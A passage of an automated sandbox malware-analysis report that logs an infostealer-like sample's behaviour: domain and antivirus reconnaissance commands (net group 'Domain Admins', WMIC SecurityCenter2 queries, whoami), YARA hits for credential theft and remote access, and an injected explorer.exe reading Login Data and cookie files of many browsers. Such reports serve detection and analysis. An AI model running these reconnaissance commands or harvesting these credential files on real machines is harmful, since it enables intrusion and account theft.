Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8CF9AC0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl, 3_2_00007FF8A8CF9AC0
Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2321695887.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.2320112731.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4535485561.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8CFDCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle, 3_2_00007FF8A8CFDCBC
Source: C:\Windows\explorer.exe Code function: 8_2_0E4D4F14 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_0E4D4F14
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC94D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo, 3_2_000001CEAFC94D00
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8DE4A20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 3_2_00007FF8A8DE4A20
Source: C:\Windows\explorer.exe Code function: 8_2_0303891C RtlGetVersion,GetVersionExW, 8_2_0303891C
Source: C:\Windows\System32\nltest.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: WMIC.exe, 00000021.00000002.3489207530.00000156669D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669C5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488726294.00000156669CC000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487382704.00000156669CB000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488748596.00000156669D0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487514545.0000015666FA1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488702292.00000156669D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3488807709.0000003146307000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000003.3488148854.0000015666F80000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489121828.00000156669B6000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487428020.00000156669B5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489100566.00000156669AA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487207652.00000156669A7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669A8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488168710.0000015666F81000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR
Source: Yara match File source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Windows\explorer.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 8_2_0E458848
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies

Remote Access Functionality

Source: Yara match File source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR
Source: Yara match File source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR